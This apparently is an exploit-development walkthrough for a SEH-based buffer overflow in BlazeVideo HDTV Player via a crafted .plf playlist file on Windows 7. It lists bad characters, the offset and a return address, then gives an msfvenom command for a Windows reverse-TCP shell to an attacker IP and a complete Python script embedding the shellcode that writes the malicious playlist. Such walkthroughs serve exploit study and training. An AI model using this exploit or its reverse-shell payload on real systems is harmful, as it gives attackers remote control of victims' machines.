BlazeVideo HDTV Player Standard - '.plf' File Remote Buffer Overflow Walkthrough

(Updated: )
reference BlazeVideo HDTV Player Standard - '.plf' File Remote Buffer Overflow
os name Microsoft Windows 7 Professional
os version 6.1.7601 Service Pack 1 Build 7601
system type x86-based PC

The original exploit is for BlazeVideo HDTV Player Standard 6.6.0.20.
But this post will focus on BlazeVideo HDTV Player Professional 6.6.0.4.

Administrator privilege is needed to run the program by default.

badchar

omitted
\x00\x0a\x1a\x2f\x3a\x5c

\x2f /
\x3a :
\x5c \

offset

omitted
872

return address

seh

omitted
DTVDeviceMaganer.dll 0x61306e71

shellcode

The PLS format is INI-like format and doesn’t really need to add http:// ahead.

1
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.89 LPORT=443  -f python  -v shellcode  -b "\x00\x0a\x1a\x2f\x3a\x5c"

exploit.py

exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
shellcode =  b""
shellcode += b"\xbd\x2b\x0b\xf6\xea\xda\xd2\xd9\x74\x24\xf4"
shellcode += b"\x58\x29\xc9\xb1\x52\x31\x68\x12\x03\x68\x12"
shellcode += b"\x83\xc3\xf7\x14\x1f\xef\xe0\x5b\xe0\x0f\xf1"
shellcode += b"\x3b\x68\xea\xc0\x7b\x0e\x7f\x72\x4c\x44\x2d"
shellcode += b"\x7f\x27\x08\xc5\xf4\x45\x85\xea\xbd\xe0\xf3"
shellcode += b"\xc5\x3e\x58\xc7\x44\xbd\xa3\x14\xa6\xfc\x6b"
shellcode += b"\x69\xa7\x39\x91\x80\xf5\x92\xdd\x37\xe9\x97"
shellcode += b"\xa8\x8b\x82\xe4\x3d\x8c\x77\xbc\x3c\xbd\x26"
shellcode += b"\xb6\x66\x1d\xc9\x1b\x13\x14\xd1\x78\x1e\xee"
shellcode += b"\x6a\x4a\xd4\xf1\xba\x82\x15\x5d\x83\x2a\xe4"
shellcode += b"\x9f\xc4\x8d\x17\xea\x3c\xee\xaa\xed\xfb\x8c"
shellcode += b"\x70\x7b\x1f\x36\xf2\xdb\xfb\xc6\xd7\xba\x88"
shellcode += b"\xc5\x9c\xc9\xd6\xc9\x23\x1d\x6d\xf5\xa8\xa0"
shellcode += b"\xa1\x7f\xea\x86\x65\xdb\xa8\xa7\x3c\x81\x1f"
shellcode += b"\xd7\x5e\x6a\xff\x7d\x15\x87\x14\x0c\x74\xc0"
shellcode += b"\xd9\x3d\x86\x10\x76\x35\xf5\x22\xd9\xed\x91"
shellcode += b"\x0e\x92\x2b\x66\x70\x89\x8c\xf8\x8f\x32\xed"
shellcode += b"\xd1\x4b\x66\xbd\x49\x7d\x07\x56\x89\x82\xd2"
shellcode += b"\xf9\xd9\x2c\x8d\xb9\x89\x8c\x7d\x52\xc3\x02"
shellcode += b"\xa1\x42\xec\xc8\xca\xe9\x17\x9b\x34\x45\x16"
shellcode += b"\x02\xdd\x94\x18\xb5\xa6\x10\xfe\xdf\xc8\x74"
shellcode += b"\xa9\x77\x70\xdd\x21\xe9\x7d\xcb\x4c\x29\xf5"
shellcode += b"\xf8\xb1\xe4\xfe\x75\xa1\x91\x0e\xc0\x9b\x34"
shellcode += b"\x10\xfe\xb3\xdb\x83\x65\x43\x95\xbf\x31\x14"
shellcode += b"\xf2\x0e\x48\xf0\xee\x29\xe2\xe6\xf2\xac\xcd"
shellcode += b"\xa2\x28\x0d\xd3\x2b\xbc\x29\xf7\x3b\x78\xb1"
shellcode += b"\xb3\x6f\xd4\xe4\x6d\xd9\x92\x5e\xdc\xb3\x4c"
shellcode += b"\x0c\xb6\x53\x08\x7e\x09\x25\x15\xab\xff\xc9"
shellcode += b"\xa4\x02\x46\xf6\x09\xc3\x4e\x8f\x77\x73\xb0"
shellcode += b"\x5a\x3c\x83\xfb\xc6\x15\x0c\xa2\x93\x27\x51"
shellcode += b"\x55\x4e\x6b\x6c\xd6\x7a\x14\x8b\xc6\x0f\x11"
shellcode += b"\xd7\x40\xfc\x6b\x48\x25\x02\xdf\x69\x6c"

payload = "A" * (872 - 4)
payload += "\xeb\x06\x41\x41"
payload += "\x71\x6e\x30\x61"
payload += "\x90" * 16
payload += shellcode
payload += "C" * (5000 - len(payload))

with open("exploit.plf", "w") as fp:
    fp.write(payload)

proof

Folder icon->Open Playlist...